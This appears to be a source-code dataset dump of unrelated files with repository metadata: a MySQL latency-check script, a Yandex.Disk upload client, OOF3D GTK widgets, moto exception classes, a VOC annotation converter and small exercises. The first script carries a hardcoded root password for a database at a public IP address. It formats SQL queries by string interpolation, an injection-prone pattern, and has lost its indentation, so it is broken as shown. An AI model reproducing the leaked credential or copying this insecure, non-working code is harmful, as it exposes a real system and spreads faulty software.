Copyright ymyjohnny@gmail.com
'''
import MySQLdb,pymongo
import datetime
def getdelaytime(date,monitorfield):
conn=MySQLdb.connect(host="221.228.90.4",user="root",passwd="uqcqa8zd",db="dsp_backend")
cursor = conn.cursor ()
    # print how many records were returned
print monitorfield
print date
data = cursor.execute("SELECT monitorfield,monitorcount,time,hostname FROM `dsp_solution_statistic` WHERE `monitorField` = '%s' AND TIME >= '%s' order by monitorcount desc limit 1" % (monitorfield,date) )
    # print the actual record contents
info = cursor.fetchmany(data)
print info
for row in info:
monitorcount = row[1]
hostname = row[3]
if monitorcount > 1:
            print date, hostname, monitorfield , monitorcount , 'ms' , 'greater than 100ms'
cursor.close ()
conn.close ()
def main():
date = datetime.datetime.now().strftime("%Y-%m-%d 15:00:00")
monitorfield = 'time-frequency-percentile98'
test1 = getdelaytime(date,monitorfield)
if __name__ == '__main__':
main()
|
[
"ymyjohnny@adsame.com"
] |
ymyjohnny@adsame.com
|
|
a97a171d741d1a379fbc9709378197c2b2bfbb73
|
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
|
/python/python_28510.py
|
c23fe77642aa17ac04c7ad7976affbf5e85feb5d
|
[] |
no_license
|
AK-1121/code_extraction
|
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
|
5297a4a3aab3bb37efa24a89636935da04a1f8b6
|
refs/heads/master
| 2020-05-23T08:04:11.789141
| 2015-10-22T19:19:40
| 2015-10-22T19:19:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 40
|
py
|
# Integrate Python and Javascript
dicts
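# A hedged sketch of what "dicts" likely points at here: a Python dict can be
# handed to JavaScript by serializing it to JSON (all names are illustrative,
# and real templates should escape the payload properly):
import json

config = {"user": "alice", "retries": 3}
html = "<script>var config = %s;</script>" % json.dumps(config)
# in the browser, `config` is now a plain JavaScript object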
|
[
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] |
ubuntu@ip-172-31-7-228.us-west-2.compute.internal
|
4ef5a54bbc1283a0dc26f68de81532d923826fd3
|
4cc285b0c585241ff4404087e6fbb901195639be
|
/NeuralNetworkNumbers/venv/Lib/site-packages/sklearn/neighbors/tests/test_dist_metrics.py
|
6a9e15308b2a1578abff065b1d60e657dfebd836
|
[] |
no_license
|
strazhg/NeuralNetworksPython
|
815542f4ddbb86e918e657f783158f8c078de514
|
15038e44a5a6c342336c119cdd2abdeffd84b5b1
|
refs/heads/main
| 2023-04-16T18:51:29.602644
| 2021-04-27T14:46:55
| 2021-04-27T14:46:55
| 361,944,482
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:20da88360cc014a240b152fa1dcbdc08031fc751b644925e7a33ecd241a0527c
size 7590
|
[
"golubstrazh@gmail.com"
] |
golubstrazh@gmail.com
|
f3c093a80db997a217f9bb39070aa1c624905138
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/7/q83.py
|
6dbc39926c8254d0523be224754339ce48893bc0
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018
| 2016-11-13T20:45:50
| 2016-11-13T20:45:50
| 73,624,224
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'q83':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
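# Hypothetical input sketch: a file line `q83 " hello world "` (note the
# space-separated quote tokens) prints `hello world`; a line whose first
# token is not `q83` prints ERROR and stops processing.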
|
[
"juliettaylorswift@gmail.com"
] |
juliettaylorswift@gmail.com
|
d8ed39fa433143eecb8f4953bd3e201a28ebc002
|
4402cb77b1a15e397fbc51f2c6f3240cbe8dfdac
|
/dbinit.py
|
1adcf7ea0df0995cb4c2bc046508782635a191c0
|
[] |
no_license
|
StrelnikovNikolay/scheduler
|
898494933967aaa5b2c60efb2dfcd664a4b2b112
|
2a56d77ce91cc2df7f04ec2defbafcdd2250219c
|
refs/heads/master
| 2016-09-06T11:50:30.827549
| 2012-06-10T06:21:44
| 2012-06-10T06:21:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
from scheduler import db
"""
create test database
"""
if __name__ == "__main__":
db.drop_all()
db.create_all()
|
[
"progolab@gmail.com"
] |
progolab@gmail.com
|
7490c35a50fa2472ac0eab374ec9e4a4348e203b
|
1feed26c45cc62e360773ad781aaaa13c6057e77
|
/modules/problem.py
|
ae39edc280554680d9529f3778885f99829ba876
|
[
"MIT"
] |
permissive
|
henriqueblang/tsp-ga
|
365cda7860862e959e0c4a2c0d5fae52c19d3e45
|
3a354bc9c0b24952c94afbaf6fcd81d94a9186af
|
refs/heads/master
| 2022-04-24T00:50:10.217634
| 2020-04-22T04:04:20
| 2020-04-22T04:04:20
| 257,787,026
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
import math
from modules.genetics.chromossome import Chromossome
# Vertex i (row) is adjacent to vertex j (column), where graph[i][j] is the edge weight
# If the graph is not complete, a non adjacent vertex is defined by None
GRAPH = (
(0, 2, 8, 5),
(2, 0, 3, 4),
(8, 3, 0, 7),
(5, 3, 7, 0)
)
# Arbitrarily long edge to complete graph (if there are any non adjacent vertexes)
NON_ADJACENT_WEIGHT = 20
def f(chromossome):
route = Chromossome.get_fenotype(chromossome.get_genes())
total_weight = 0
total_vertexes = len(GRAPH)
for i in range(total_vertexes):
vertex = route[i]
        next_vertex = route[(i + 1) % total_vertexes]  # wrap around so the tour returns to its start
edge_weight = GRAPH[vertex][next_vertex]
if edge_weight is None:
edge_weight = NON_ADJACENT_WEIGHT
total_weight += edge_weight
return total_weight
# Fitness
def g(chromossome):
return 1 / (1 + f(chromossome))
def f_average(population):
avg = 0
for chromossome in population:
avg += f(chromossome)
avg /= len(population)
return avg
def g_average(population):
avg = 0
for chromossome in population:
avg += g(chromossome)
avg /= len(population)
return avg
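# Hypothetical worked example (assuming get_fenotype yields a permutation of
# the vertexes): the route [0, 1, 2, 3] costs f = 2 + 3 + 7 + 5 = 17 on the
# GRAPH above, the final 5 being the wrap-around edge 3 -> 0 that closes the
# tour, so its fitness is g = 1 / (1 + 17) = 1/18.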
|
[
"henrique.barcia@gec.inatel.br"
] |
henrique.barcia@gec.inatel.br
|
048085a4613537f236c977ce9eff9367f84860e5
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/28/usersdata/104/8782/submittedfiles/serie1.py
|
ad5d8a8cd81f84e3767fed50f00399919ee89084
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
# INPUT
n=input('Enter the value of n:')
# OUTPUT + PROCESSING
soma=1
for i in range(2,n+1,1):
if i%2==0:
soma=soma-(1/i)
else:
soma=soma+(1/i)
print(soma)
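# Worked example: for n = 4 the partial sum is 1 - 1/2 + 1/3 - 1/4 ≈ 0.5833;
# as n grows, this alternating harmonic series approaches ln(2) ≈ 0.6931.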
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
61d3d86f3753c466dffd3af885d02a4beac04ea4
|
88413e9ca2eae9945f9bc495084f7e01f14b7396
|
/SRC/common/IO/GUI/whowidget.py
|
66865d230ca2773221dac43d51c461f76ee80fac
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
ljuillen/OOF3D
|
6867e298efdf5a82544e66bd6bf1868b0dce9051
|
b17bc6b5efefff10beca7b0f7d12ce93def33479
|
refs/heads/master
| 2020-12-21T13:50:05.805046
| 2019-08-22T15:59:22
| 2019-08-22T15:59:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,869
|
py
|
# -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
# Widget for choosing from a WhoClass. WhoWidget.get_value() returns
# the name of the selected object, which is what is necessary for
# scripting. The function using the result presumably knows how to
# use WhoClass.__getitem__ to get the actual object.
# The optional 'callback' argument to the constructor is called when a
# selection is made. The single argument to the callback function is
# the selected object (ie, the .obj member of the Who instance).
# The WhoWidget is different from the usual ParameterWidget (in
# parameterwidgets.py) because it contains a list of gtk objects
# instead of just one. Therefore it's not derived from
# ParameterWidget, and must do the work of that class by itself.
# Perhaps this is a symptom of bad design.
from ooflib.SWIG.common import switchboard
from ooflib.common import debug
from ooflib.common import labeltree
from ooflib.common.IO import whoville
from ooflib.common.IO.GUI import chooser
#from ooflib.common.IO.GUI import gtklogger
from ooflib.common.IO.GUI import parameterwidgets
from ooflib.common.IO.GUI import widgetscope
import gtk
import string
class WhoWidgetBase:
def __init__(self, whoclass, value, callback, scope, condition, sort,
widgettype, verbose=False):
debug.mainthreadTest()
self.whoclass = whoclass
self.scope = scope # WidgetScope object
self.verbose = verbose
# condition(obj) is a function that returns 1 if the object
# should be listed.
self.condition = condition
# sort is a function that takes a list of names and sorts them
# into the order in which they should appear in the GUI.
self.sort = sort
# widgettype must be either 'Chooser' or 'Combo'. It
# specifies the type of subwidget to use for the lowest widget
# in the Who hierarchy.
self.widgettype = widgettype
if scope:
scope.addWidget(self)
self.callback = callback
depth = len(whoclass.hierarchy())
# self.proxycheck = gtk.CheckButton()
self.proxy_names = []
self.widgets = [None]*depth
self.gtk = [None]*depth
self.currentPath = ['']*depth
self.destroysignals = [None]*depth
self.buildWidgets(value) # sets currentPath, widgets, and gtk
self.sbcallbacks = []
for whoklass in whoclass.hierarchy():
self.sbcallbacks += [
switchboard.requestCallbackMain(
('new who', whoklass.name()), self.newWhoCB),
switchboard.requestCallbackMain(
('remove who', whoklass.name()), self.newWhoCB),
switchboard.requestCallbackMain(
('rename who', whoklass.name()), self.renameWhoCB)
]
def buildWidgets(self, value=None, interactive=0):
debug.mainthreadTest()
# Construct a Chooser widget for each WhoClass in the target
# WhoClass's hierarchy. interactive is 1 if this call is in
# response to a user action.
## oldvalue = self.get_value()
oldpath = self.currentPath[:]
classlist = self.whoclass.hierarchy()
depth = len(classlist)
# Make sure value is a list.
value = labeltree.makePath(value)
# Make a list of the allowed proxies for the lowermost tier of
# the class hierarchy for this widget. Allowed proxies are
# those which satisfy both the passed-in condition *and* are
# proxies.
self.proxy_names = [x[0] for x in classlist[-1].keys(
condition = lambda x: (self.condition(x) and
not whoville.excludeProxies(x)),
sort=self.sort)]
# Make sure that value contains a setting for each chooser widget
if value and len(value) < depth:
value += [None]*(depth-len(value))
for d in range(depth):
try:
# Exclude proxies from this part of the process...
paths = classlist[d].keys(
base=self.currentPath[:d],
condition=lambda x:
self.condition(x) and whoville.excludeProxies(x) and not x.secret(),
sort=self.sort)
except KeyError, exc:
names = []
else:
names = [p[0] for p in paths]
if d==0:
# In the top-most level of the widget, include the
# proxy names for the lowermost level.
names += self.proxy_names
if self.widgets[d] is None:
if self.widgettype == 'Chooser' or d < depth-1:
self.widgets[d] = chooser.ChooserWidget(
names, callback=self.selectCB, callbackargs=(d,),
name=classlist[d].name())
else:
self.widgets[d] = chooser.ChooserComboWidget(
names, callback=self.comboCB,
name=classlist[d].name())
self.gtk[d] = self.widgets[d].gtk
self.destroysignals[d] = self.gtk[d].connect('destroy',
self.destroyCB, d)
else:
# Update the list of choices in an existing ChooserWidget.
self.widgets[d].update(names)
if value and value[d] in names:
# Set widget to the given value
self.widgets[d].set_state(value[d])
self.currentPath[d] = value[d]
elif self.currentPath[d] in names:
# ... or retain previous value
self.widgets[d].set_state(self.currentPath[d])
elif len(names) > 0:
# ... or pick the first value in the list
self.currentPath[d] = names[0]
self.widgets[d].set_state(0)
else:
# ... or don't pick anything
self.currentPath[d] = ''
if self.widgettype == 'Chooser':
self.gtk[d].set_sensitive(names != [])
# end for d in range(depth)
# The state of other widgets may depend on the state of this
# one. If so, they can use the WidgetScope mechanism to find
# this widget and listen for the following switchboard
# message. (Note that it's not sufficient to check to see if
# get_value()'s return value has changed. The return value
# can be None both before and after a state change.)
if oldpath != self.currentPath:
switchboard.notify(self, interactive=interactive)
def destroyCB(self, gtkwidget, d):
if self.widgets:
self.cleanUp()
def destroy(self):
debug.mainthreadTest()
for gtkwid in self.gtk:
gtkwid.destroy()
def cleanUp(self):
map(switchboard.removeCallback, self.sbcallbacks)
self.sbcallbacks = []
self.gtk = []
self.widgets = []
self.whoclass = None
if self.scope:
self.scope.removeWidget(self)
self.scope = None
def newWhoCB(self, whoname): # switchboard ("new who", classname)
self.buildWidgets()
def renameWhoCB(self, oldpath, newname): # sb ("rename who", classname)
# The object being renamed might be an internal node, in which
# case the path being passed in will be shorter than required
# for setting the state of this widget.
opath = labeltree.makePath(oldpath) # old path to renamed object
npath = opath[:-1] + [newname] # new path to renamed object
cpath = self.currentPath # current path
if opath == cpath[:len(opath)]: # path to current object is changing
npath += cpath[len(opath):] # new path to current object
self.buildWidgets(npath)
else: # change does not affect current object
self.buildWidgets()
def selectCB(self, gtkobj, name, d): # ChooserWidget callback
newpath = self.currentPath[:]
newpath[d] = name
self.buildWidgets(newpath, interactive=1) # sets currentPath
if self.callback:
self.callback(self.currentPath)
def comboCB(self, widget): # ChooserComboWidget callback
# Since the ChooserComboWidget represents a leaf of the
# WhoClass heirarchy, there's no need to rebuild the other
# widgets. We just have to tell the world that the value has
# changed.
switchboard.notify(self, interactive=1)
def set_value(self, value):
path = labeltree.makePath(value)
self.buildWidgets(path)
class WhoWidget(WhoWidgetBase):
def __init__(self, whoclass, value=None, callback=None, scope=None,
name=None,
condition=whoville.excludeProxies,
sort=whoville.proxiesLast,
verbose=False):
WhoWidgetBase.__init__(self, whoclass, value, callback, scope,
condition, sort, widgettype='Chooser',
verbose=verbose)
def get_value(self, depth=None):
if depth is None:
depth = len(self.currentPath)
# In proxy case, ignore depth.
if self.currentPath[0] in self.proxy_names:
return self.currentPath[0]
if '' in self.currentPath[:depth]:
return None
return string.join(self.currentPath[:depth], ':')
def isValid(self):
if self.currentPath[0] in self.proxy_names:
return True
return '' not in self.currentPath
# The NewWhoWidget is used in the NewWhoParameterWidget, and
# substitutes a ChooserCombo for the Chooser at the lowest level of
# the WhoClass hierarchy. This allows the user to type in the name of
# a new Who object, instead of simply choosing between existing ones.
# The ChooserCombo doesn't support any callbacks, so the NewWhoWidget
# doesn't either. This makes it appropriate for use only in passive
# situations. It can't initiate any action on its own.
class NewWhoWidget(WhoWidgetBase):
def __init__(self, whoclass, value=None, callback=None, scope=None,
name=None,
condition=whoville.excludeProxies,
sort=whoville.proxiesLast,
verbose=False):
WhoWidgetBase.__init__(self, whoclass, value, callback, scope,
condition, sort, widgettype='Combo',
verbose=verbose)
def get_value(self):
# This is slightly nontrivial because the ChooserCombo doesn't
# have a callback, so the last part of self.currentPath isn't
# automatically updated.
debug.mainthreadTest()
if self.widgets and self.widgets[-1]:
self.currentPath[-1] = self.widgets[-1].get_value()
return string.join(self.currentPath, ':')
def isValid(self):
debug.mainthreadTest()
if self.widgets and self.widgets[-1]:
return self.widgets[-1].get_value()
###################################
# The WhoParameterWidget assembles the components of a WhoWidget into
# a table so that the WhoWidget can be placed in automatically
# generated GUI objects (eg, RegisteredClassFactories). It is a
# WidgetScope and as such contains its WhoWidget, so that other
# widgets searching for the WhoWidget can find it. Other widgets
# should never have to search for the WhoParameterWidget explicitly.
class WhoParameterWidgetBase(parameterwidgets.ParameterWidget,
widgetscope.WidgetScope):
def __init__(self, whoclass, value=None, scope=None, name=None, sort=None,
condition=whoville.excludeProxies, verbose=False):
debug.mainthreadTest()
widgetscope.WidgetScope.__init__(self, scope)
self.whowidget = self.makeSubWidgets(whoclass, value, condition, sort,
verbose=verbose)
# Put the WhoWidget's components into a box.
depth = len(self.whowidget.gtk)
frame = gtk.Frame()
frame.set_shadow_type(gtk.SHADOW_IN)
vbox = gtk.VBox()
frame.add(vbox)
parameterwidgets.ParameterWidget.__init__(self, frame, scope, name,
verbose=verbose)
for d in range(depth):
vbox.pack_start(self.whowidget.gtk[d], expand=0, fill=0)
self.wwcallback = switchboard.requestCallbackMain(self.whowidget,
self.widgetCB)
self.widgetCB(0)
def set_value(self, value):
self.whowidget.set_value(value)
def get_value(self):
return self.whowidget.get_value()
def cleanUp(self):
parameterwidgets.ParameterWidget.cleanUp(self)
self.destroyScope()
switchboard.removeCallback(self.wwcallback)
def widgetCB(self, interactive): # validity check
val = self.get_value()
self.widgetChanged(val and val[-1] != ':', interactive)
class WhoParameterWidget(WhoParameterWidgetBase):
def makeSubWidgets(self, whoclass, value, condition, sort, verbose=False):
return WhoWidget(whoclass, value, scope=self, condition=condition,
sort=sort, verbose=verbose)
class NewWhoParameterWidget(WhoParameterWidgetBase):
def makeSubWidgets(self, whoclass, value, condition, sort, verbose=False):
return NewWhoWidget(whoclass, value, scope=self, condition=condition,
sort=sort, verbose=verbose)
def _WhoParameter_makeWidget(self, scope=None, verbose=False):
return WhoParameterWidget(self.whoclass, self.value, scope=scope,
name=self.name, verbose=verbose)
whoville.WhoParameter.makeWidget = _WhoParameter_makeWidget
def _NewWhoParameter_makeWidget(self, scope=None, verbose=False):
return NewWhoParameterWidget(self.whoclass, self.value, scope=scope,
name=self.name, verbose=verbose)
whoville.NewWhoParameter.makeWidget = _NewWhoParameter_makeWidget
###############################################
class WhoClassParameterWidget(parameterwidgets.ParameterWidget):
def __init__(self, value, scope=None, name=None,
condition=whoville.noSecretClasses,
verbose=False):
self.chooser = chooser.ChooserWidget(whoville.classNames(condition),
callback=self.chooserCB,
name=name)
parameterwidgets.ParameterWidget.__init__(self, self.chooser.gtk, scope,
verbose=verbose)
self.sb = switchboard.requestCallbackMain('new who class',
self.newWhoClass)
self.set_value(value)
self.condition = condition
def newWhoClass(self, classname):
self.chooser.update(whoville.classNames(self.condition))
def chooserCB(self, gtkobj, name):
switchboard.notify(self, interactive=1)
self.widgetChanged(self.get_value() is not None, interactive=1)
def set_value(self, value):
self.chooser.set_state(value) # does not call chooserCB
switchboard.notify(self, interactive=0)
# Use self.get_value(), not value, to check validity, because
# value may be None, in which case the actual value is
# whatever's first in the Chooser.
self.widgetChanged(self.get_value() is not None, interactive=0)
def get_value(self):
return self.chooser.get_value()
def cleanUp(self):
switchboard.removeCallback(self.sb)
parameterwidgets.ParameterWidget.cleanUp(self)
def _WhoClassParameter_makeWidget(self, scope=None, verbose=False):
return WhoClassParameterWidget(self.value, scope=scope, name=self.name,
condition=self.condition,
verbose=verbose)
whoville.WhoClassParameter.makeWidget = _WhoClassParameter_makeWidget
###############################################
class AnyWhoParameterWidget(parameterwidgets.ParameterWidget,
widgetscope.WidgetScope):
# See comment in WhoParameterWidget about WidgetScope.
def __init__(self, value, scope, name=None, verbose=False):
widgetscope.WidgetScope.__init__(self, scope)
parameterwidgets.ParameterWidget.__init__(self, gtk.VBox(), scope, name,
verbose=verbose)
self.classwidget = scope.findWidget(
lambda w: isinstance(w, WhoClassParameterWidget))
self.whopwidget = None # enclosed WhoParameterWidget
self.whoclassname = None
self.whoSignal = None
self.buildWidget()
self.set_value(value)
self.classSignal = switchboard.requestCallbackMain(
self.classwidget, self.classChangedCB)
def cleanUp(self):
parameterwidgets.ParameterWidget.cleanUp(self)
switchboard.removeCallback(self.classSignal)
if self.whoSignal:
switchboard.removeCallback(self.whoSignal)
def classChangedCB(self, *args, **kwargs):
if self.classwidget.get_value() != self.whoclassname:
self.buildWidget()
def buildWidget(self):
debug.mainthreadTest()
if self.whopwidget:
self.whopwidget.destroy()
self.whoclassname = self.classwidget.get_value()
whoclass = whoville.getClass(self.whoclassname)
# Create a WhoWidget that doesn't exclude proxy who
# objects. If it's necessary to create an
# AnyWhoParameterWidget with a different exclusion policy,
# then the AnyWhoParameter will need to have a 'condition'
# attribute that can be passed in to the widget.
self.whopwidget = WhoParameterWidget(whoclass, scope=self,
sort=whoville.proxiesLast,
condition=lambda x:1)
if self.whoSignal:
switchboard.removeCallback(self.whoSignal)
self.whoSignal = switchboard.requestCallbackMain(self.whopwidget,
self.whoChangedCB)
self.gtk.pack_start(self.whopwidget.gtk)
self.gtk.show_all()
self.widgetChanged(self.get_value() is not None, interactive=0)
def whoChangedCB(self, *args):
self.widgetChanged(self.get_value() is not None, interactive=1)
def set_value(self, value):
self.whopwidget.set_value(value)
# Use self.get_value(), not value, to check validity, because
# value may be None, in which case the actual value is
# whatever's first in the Chooser.
self.widgetChanged(self.get_value() is not None, interactive=0)
def get_value(self):
return self.whopwidget.get_value()
def _AnyWhoParameter_makeWidget(self, scope=None, verbose=False):
return AnyWhoParameterWidget(self.value, scope=scope, name=self.name,
verbose=verbose)
whoville.AnyWhoParameter.makeWidget = _AnyWhoParameter_makeWidget
|
[
"faical.congo@nist.gov"
] |
faical.congo@nist.gov
|
9d0e351bfa38fc82b31382b48b8115881e12eb82
|
eecd638aed3e5952d158c6f080f2aa9bc772ca7e
|
/YaDisk.py
|
9635f8950042620cbad69d08910c0b0040f31c08
|
[] |
no_license
|
OksanaSha/coursework_october
|
0d6a3b488b746c9e5f3816e1a54f3740cc004d81
|
fb2de7206d7db40d7d405b97d28dca2a881faf05
|
refs/heads/master
| 2023-08-21T19:08:59.923239
| 2021-10-22T18:21:53
| 2021-10-22T18:27:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,208
|
py
|
import requests
class YaDisk:
def __init__(self, token):
self.token = token
def get_headers(self):
return {
'Content-Type': 'application/json',
'Authorization': f'OAuth {self.token}'
}
def upload_file(self, file_url, name_dir, file_name):
upload_url = 'https://cloud-api.yandex.net/v1/disk/resources/upload'
path = f'{name_dir}/{file_name}.jpg'
params = {'url': file_url, 'path': path}
headers = self.get_headers()
response = requests.post(url=upload_url, headers=headers, params=params)
if response.status_code != 202:
print(response.status_code)
def create_dir(self, name_dir):
url = 'https://cloud-api.yandex.net/v1/disk/resources'
params = {'path': name_dir}
headers = self.get_headers()
response = requests.put(url=url, headers=headers, params=params)
if response.status_code == 201:
            print(f'Folder "{name_dir}" created on Yandex.Disk')
elif response.status_code == 409:
            print(f'Folder "{name_dir}" already exists')
else:
print(response.status_code)
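# A minimal usage sketch (hypothetical token, folder and file names, not part
# of the original script; real calls need a valid Yandex.Disk OAuth token):
#
#   disk = YaDisk('YOUR_OAUTH_TOKEN')
#   disk.create_dir('vk_photos')
#   disk.upload_file('https://example.com/photo.jpg', 'vk_photos', 'avatar')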
|
[
"oksanashatalova@bk.ru"
] |
oksanashatalova@bk.ru
|
a509f4e8e220d22d6a23906514d73f383eb93a0b
|
4ef688b93866285bcc27e36add76dc8d4a968387
|
/moto/route53resolver/exceptions.py
|
e0ce342b448e1b445409540ec36f23c090c5211f
|
[
"Apache-2.0"
] |
permissive
|
localstack/moto
|
cec77352df216cac99d5e0a82d7ada933950a0e6
|
b0b2947e98e05d913d7ee2a0379c1bec73f7d0ff
|
refs/heads/localstack
| 2023-09-01T05:18:16.680470
| 2023-07-10T09:00:26
| 2023-08-07T14:10:06
| 118,838,444
| 22
| 42
|
Apache-2.0
| 2023-09-07T02:07:17
| 2018-01-25T00:10:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,366
|
py
|
from typing import List, Tuple
from moto.core.exceptions import JsonRESTError
class RRValidationException(JsonRESTError):
code = 400
def __init__(self, error_tuples: List[Tuple[str, str, str]]):
"""Validation errors are concatenated into one exception message.
error_tuples is a list of tuples. Each tuple contains:
- name of invalid parameter,
- value of invalid parameter,
- string describing the constraints for that parameter.
"""
msg_leader = (
f"{len(error_tuples)} "
f"validation error{'s' if len(error_tuples) > 1 else ''} detected: "
)
msgs = []
for arg_name, arg_value, constraint in error_tuples:
msgs.append(
f"Value '{arg_value}' at '{arg_name}' failed to satisfy "
f"constraint: Member must {constraint}"
)
super().__init__("ValidationException", msg_leader + "; ".join(msgs))
class InvalidNextTokenException(JsonRESTError):
code = 400
def __init__(self) -> None:
super().__init__(
"InvalidNextTokenException",
"Invalid value passed for the NextToken parameter",
)
class InvalidParameterException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("InvalidParameterException", message)
class InvalidRequestException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("InvalidRequestException", message)
class LimitExceededException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("LimitExceededException", message)
class ResourceExistsException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ResourceExistsException", message)
class ResourceInUseException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ResourceInUseException", message)
class ResourceNotFoundException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ResourceNotFoundException", message)
class TagValidationException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ValidationException", message)
|
[
"noreply@github.com"
] |
localstack.noreply@github.com
|
46a7f1350601ecdbc3531d9b011717dc8aced37f
|
b1fe0349febf70932f95cae5ed3f0d8768be992f
|
/voc_annotation.py
|
2ef424d5a38cc8c57ec752296db0f1a1433da4a0
|
[
"MIT"
] |
permissive
|
Snaill123/Crack-Detection-YOLOV3
|
537d24fa477d05b4b9b00702d522bf4365399760
|
694bcd2a1802d0e1ed9504b4a2429af84069af5a
|
refs/heads/master
| 2020-05-16T16:16:25.535414
| 2018-12-16T07:02:54
| 2018-12-16T07:02:54
| 183,156,921
| 5
| 0
| null | 2019-04-24T05:49:37
| 2019-04-24T05:49:36
| null |
UTF-8
|
Python
| false
| false
| 3,527
|
py
|
import os
import xml.etree.ElementTree as ET
from tqdm import tqdm
from os import getcwd
sets=[('2007', 'train')]
classes = ["neg"]
def _write_data():
xmlfilepath = 'DATA/VOC2007/Annotations'
txtsavepath = 'DATA/VOC2007/ImageSets/Main'
all_images = [i.split('.')[0] for i in os.listdir(xmlfilepath)]
with open(os.path.join(txtsavepath, 'train.txt'), 'w') as train_f:
for i in all_images:
train_f.write(str(i)+'\n')
def _write_amend_data():
xmlfilepath = 'DATA/Amend_VOC2007/Annotations'
txtsavepath = 'DATA/Amend_VOC2007/ImageSets/Main'
all_images = [i.split('.')[0] for i in os.listdir(xmlfilepath)]
with open(os.path.join(txtsavepath, 'train.txt'), 'w') as train_f:
for i in all_images:
train_f.write(str(i) + '\n')
def _convert_annotation(year, image_id, list_file):
in_file = open('DATA/VOC%s/Annotations/%s.xml'%(year, image_id))
tree=ET.parse(in_file)
root = tree.getroot()
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult)==1:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (int(xmlbox.find('xmin').text), int(xmlbox.find('ymin').text), int(xmlbox.find('xmax').text), int(xmlbox.find('ymax').text))
list_file.write(" " + ",".join([str(a) for a in b]) + ',' + str(cls_id))
def _convert_amend_annotation(year, image_id, list_file):
in_file = open('DATA/Amend_VOC%s/Annotations/%s.xml' % (year, image_id))
tree = ET.parse(in_file)
root = tree.getroot()
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult) == 1:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (int(xmlbox.find('xmin').text), int(xmlbox.find('ymin').text), int(xmlbox.find('xmax').text),
int(xmlbox.find('ymax').text))
list_file.write(" " + ",".join([str(a) for a in b]) + ',' + str(cls_id))
def transform_data(usage='train'):
wd = getcwd()
if usage == 'train':
_write_data()
for year, image_set in sets:
image_ids = open('DATA/VOC%s/ImageSets/Main/%s.txt' % (year, image_set)).read().strip().split()
list_file = open(os.path.join('model_data', '%s_%s.txt' % (year, image_set)), 'w')
            for image_id in tqdm(image_ids, desc="Converting dataset [%s]" % usage):
list_file.write('%s/DATA/VOC%s/JPEGImages/%s.jpg' % (wd, year, image_id))
_convert_annotation(year, image_id, list_file)
list_file.write('\n')
list_file.close()
elif usage == 'amend':
_write_amend_data()
for year, image_set in sets:
image_ids = open('DATA/Amend_VOC%s/ImageSets/Main/%s.txt' % (year, image_set)).read().strip().split()
list_file = open(os.path.join('model_data', '%s_%s.txt' % (year, image_set)), 'w')
            for image_id in tqdm(image_ids, desc="Converting dataset [%s]" % usage):
list_file.write('%s/DATA/Amend_VOC%s/JPEGImages/%s.jpg' % (wd, year, image_id))
_convert_amend_annotation(year, image_id, list_file)
list_file.write('\n')
list_file.close()
else:
        raise ValueError("Please specify a valid dataset usage: 'train' or 'amend'")
if __name__ == '__main__':
    transform_data()
|
[
"1011836423@qq.com"
] |
1011836423@qq.com
|
40b4345a29324b82ea57abfae90c4db05b805c43
|
95db37486077442a6e3b368d3cc76674cfd2ff53
|
/opencv-tutorial/opencv_tutorial_01.py
|
2e37e31e0127ba44bf4c869e30c43dd35383f8ee
|
[] |
no_license
|
freebreadstix/computer_vision
|
971692da3dd23b6191d63bc10fe977a4619d2783
|
eadb931d4323c480331f6612514767ddc62a5149
|
